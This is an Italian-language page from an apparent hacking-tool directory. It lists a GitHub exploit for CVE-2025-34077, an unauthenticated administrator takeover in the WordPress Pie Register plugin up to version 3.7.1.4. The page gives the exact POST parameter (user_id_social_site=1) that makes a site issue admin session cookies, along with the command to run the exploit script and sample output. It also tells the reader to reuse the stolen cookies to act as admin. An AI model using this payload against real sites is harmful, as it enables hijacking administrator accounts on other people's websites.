Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/mrjhaxcore/cve-2025-34077
Autenticazione e AutorizzazioneEscalation di PrivilegiAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration Testing
GitHubmrjhaxcore/cve-2025-34077

CVE-2025-34077

WordPress Pie Register ≤ 3.7.1.4 - Escalation dei privilegi di amministratore (Non autenticato)

Vedi Repository
63431 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-34077 — WordPress Pie Register ≤ 3.7.1.4 - Escalation dei privilegi di amministratore (non autenticata)

Exploit Status CVE Badge Python

💀 Autore

Mrj Haxcore

🧠 Riepilogo della vulnerabilità

Il plugin Pie Register per WordPress (versione ≤ 3.7.1.4) espone un endpoint non autenticato che consente a un attaccante di dirottare le sessioni di amministratore semplicemente inviando un payload specifico via POST.

Lo sfruttamento consente di rubare i cookie di sessione dell'utente ID 1 (di solito admin) senza bisogno di alcuna credenziale di accesso.


📦 Software interessato

  • Nome del plugin: Pie Register
  • Versione: <= 3.7.1.4
  • Plugin Slug: pie-register
  • Pagina del plugin
  • Link di download vulnerabile

📬 Parametro vulnerabile:

user_id_social_site=1

Quando viene inviato all'URL radice (/), questo parametro fa sì che il plugin autentichi l'attaccante come l'utente con ID 1 (tipicamente admin) e generi cookie di sessione validi.


🔧 Requisiti

  • Python 3.x
  • requests, beautifulsoup4 (opzionali, per il parsing dei cookie)

▶️ Esegui l'exploit

root@kitploit:~
python3 pie.py http://target.site

---
Output
[*] Sending payload to hijack admin session...

[+] Successfully hijacked cookies for user_id=1 (admin):
    wordpress_sec_xxxxxx = <cookie_value>
    wordpress_logged_in_xxxxxx = <cookie_value>

[!] Use these cookies in your browser or tools like curl or Burp to act as admin.
Scarica lo strumento